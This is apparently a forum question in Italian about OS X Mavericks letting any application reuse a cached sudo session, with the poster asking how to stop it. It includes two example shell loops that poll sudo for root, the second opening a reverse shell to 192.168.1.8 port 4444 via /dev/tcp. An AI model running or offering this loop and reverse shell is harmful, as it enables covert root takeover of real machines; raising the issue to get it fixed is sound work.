Ho notato recentemente su OS X Mavericks che l'esecuzione di sudo non solo consentirà a una di eseguirla di nuovo nella stessa finestra o nella stessa applicazione, ma permetterà a qualsiasi applicazione di eseguire comandi di shell come root. Ciò significherebbe che qualsiasi applicazione che tenta continuamente di eseguire sudo senza password in un ciclo otterrebbe i privilegi di root. C'è un modo per cambiare questo?
Esempio di script di shell:
while (true) do
if [ 'echo ""|sudo -S whoami' = "root" ]; then
say root
echo root
exit
fi
done
Se viene eseguito in background e quindi viene eseguito un comando sudo, verrà chiamato root, quindi verrà chiuso. Un altro esempio di cui sarei più preoccupato è questo:
while (true) do
if [ 'echo ""|sudo -S whoami' = "root" ]; then
bash -i > /dev/tcp/192.168.1.8/4444 0>&1
fi
done